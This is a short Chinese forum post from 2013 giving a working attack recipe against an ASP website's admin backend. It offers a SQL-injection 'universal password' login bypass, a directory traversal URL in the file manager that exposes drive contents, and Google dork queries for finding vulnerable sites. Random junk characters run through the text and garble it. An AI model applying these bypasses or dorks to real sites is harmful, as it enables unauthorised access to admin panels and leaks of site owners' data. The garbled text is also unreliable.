后台万能密码 'or'='or') C1 m7 j' t6 ^4 w) o. U" f G( F
4 N/ W" W. u |8 E' V# o. z+ ?后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
4 i) V! Z. w3 ?$ [admin/uploadfile.asp?currentFolder=/upfiles/../! f, k; ^! z7 |! F# a
" F. D8 Q. X: z: d3 {4 W3 F8 H' u漏洞证明:
- O2 X6 [5 y c7 K! b' ]5 M0 [8 q2 S T( u& @
谷歌:inurl:type.asp?id=1 新闻中心9 F# A N9 k+ O% Y
或者 :inurl:download_ok.asp?
: E( n' j3 g7 r6 ^- |' `" @
! F; `+ `- H) K, J |
发表于 2013-3-14 20:17:32
收藏
支持
反对